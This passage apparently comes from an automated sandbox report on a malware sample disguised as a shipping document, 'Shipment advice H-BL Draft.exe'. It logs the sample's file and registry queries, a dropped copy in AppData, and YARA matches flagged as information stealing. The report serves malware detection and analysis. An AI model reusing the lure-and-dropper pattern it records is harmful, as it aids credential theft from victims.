                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match | File source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
